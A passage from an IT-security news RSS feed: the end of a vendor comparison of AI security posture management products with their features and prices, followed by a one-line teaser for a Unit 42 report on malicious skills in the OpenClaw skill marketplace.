href="https://www.paloaltonetworks.com/sase/prisma-browser">separate Prisma secure browser extension</a> that works with these products to protect your endpoints, and that originated from technology it purchased from Talon Cyber Security in 2023. While pricing was not disclosed, our estimate is that AIRS will cost in the low six figures annually.</p>



<h3 class="wp-block-heading">Proofpoint People Protection Platform</h3>



<p>Proofpoint includes a <a href="https://www.proofpoint.com/us/products/ai-access-security">general AI security product</a> as part of its People Protection Platform that covers a wide range of protective services integrated across its other non-AI security tools. It provides runtime inspection of potential AI misconfigurations, as well as policies that include detection of agent, tools, and MCP connections, and it can generate forensic audits of AI interactions. Proofpoint’s general security platform starts at <a href="https://aws.amazon.com/marketplace/pp/prodview-dcj7rctb55qie?sr=0-1&amp;ref_=beagle&amp;applicationId=AWSMPContessa">$96,000 annually on AWS Marketplace</a>. It has several integrations with third-party services across the major cloud platform providers.</p>



<h3 class="wp-block-heading">SentinelOne Singularity Platform</h3>



<p><a href="https://www.sentinelone.com/platform/securing-ai/">SentinelOne’s Singularity platform</a> offers several AI protective features, including misconfiguration detection, attack path analysis, automated AI inventory and remediation, and integration with a variety of AI PaaS platforms such as Azure OpenAI, Google’s Vertex AI, and various AWS services. It is bundled within the company’s Cloud Native Security tool. Some of these features originated with Singularity’s purchase of Prompt.Security. Access to all the features requires purchasing the enterprise edition, which is offered with custom pricing, but lower feature tiers are available for $80 per year on <a href="https://www.sentinelone.com/platform-packages/">this public pricing page</a>. There are also <a href="https://www.sentinelone.com/partners/singularity-marketplace/">numerous integrations with its Marketplace</a>.</p>



<h3 class="wp-block-heading">Varonis Atlas AI Security</h3>



<p><a href="https://www.varonis.com/solutions/ai-security">Varonis Atlas AI Security</a> is a multipurpose security platform that offers a variety of modules, including red team/penetration testing, compliance, and third-party risk management. Its AI-SPM module is combined with an AI inventory scanner and can be used to help development teams classify data used in the AI ecosystem, such as scanning for bad AI behavior, leveraging identities improperly, and examining data flows. Automated remediation processes are built into the tool as well. There are several <a href="https://www.varonis.com/coverage">hundred third-party integrations available</a> for a wide collection of security tools, such as JFrog, Jira, Okta, and Salesforce. Varonis has two pricing components; one based on per user and per protected application and an additional price for resource consumption. Atlas is sold on the <a href="https://aws.amazon.com/marketplace/pp/prodview-ibgbkrqusncsm?sr=0-1&amp;ref_=beagle&amp;applicationId=AWSMPContessa">AWS Marketplace starting at $108,000 per year</a> and free risk assessments are available to qualified customers.</p>



<h3 class="wp-block-heading">Wiz/Google AI Application Protection Platform</h3>



<p>Google has acquired Wiz but kept its operation independent. It has a <a href="https://www.wiz.io/solutions/ai-spm">multipurpose security platform</a> that comes from a strong posture management (cloud and data) background. Its advanced version has been augmented with a comprehensive AI-related series of policies, detection algorithms, and pipeline, model, and data scanners. These are assembled into a separate AI dashboard page. It can also detect AI pipeline abuses, protect AI runtimes, identify and classify tools and agents, map dependencies graphically and suggest remediation steps. It also contains core AI-SPM features such as discovery, attack path analysis, and supply chains. Pricing for the Wiz Advanced bundle on <a href="https://aws.amazon.com/marketplace/pp/prodview-ibgbkrqusncsm?sr=0-1&amp;ref_=beagle&amp;applicationId=AWSMPContessa">AWS Marketplace is $38,000 annually</a>.</p>



<h2 class="wp-block-heading">What about AI-SPM pricing?</h2>



<p>Pricing and packaging of AI-SPM tools vary widely. Many vendors offer free trials limited to differing periods (an option that is also available on the AWS Marketplace). We pointed out the open-source alternatives earlier, which is also a good way to see how the products work, but we wouldn’t recommend relying on these tools given their lack of recent updates. The only vendors that have (mostly) transparent pricing are Guardrail Technologies (with both free and monthly plans) and SentinelOne (with various annual plans starting at $80 per endpoint). Most of the vendors didn’t want to provide pricing directly but have published pricing on the AWS Marketplace, which can give you a rough indication that most start in the low six figures for annual contracts. For a typical situation with 1,000 users the total could be in the low six-figure range annually.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw’s Skill Marketplace and the Emerging AI Supply Chain Threat]]></title>
<description><![CDATA[Unit 42's analysis of ClawHub revealed evasive malicious skills bypassing automated scanners to deploy infostealers and execute agentic financial fraud.
The post OpenClaw’s Skill Marketplace and the Emerging AI Supply Chain Threat appeared first on Unit 42.]]></description>
<link>https://tsecurity.de/de/3619765/it-security-nachrichten/openclaws-skill-marketplace-and-the-emerging-ai-supply-chain-threat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619765/it-security-nachrichten/openclaws-skill-marketplace-and-the-emerging-ai-supply-chain-threat/</guid>
<pubDate>Wed, 24 Jun 2026 00:23:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Unit 42's analysis of ClawHub revealed evasive malicious skills bypassing automated scanners to deploy infostealers and execute agentic financial fraud.</p>
<p>The post <a href="https://unit42.paloaltonetworks.com/openclaw-ai-supply-chain-risk/">OpenClaw’s Skill Marketplace and the Emerging AI Supply Chain Threat</a> appeared first on <a href="https://unit42.paloaltonetworks.com/">Unit 42</a>.</p>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,44ms -->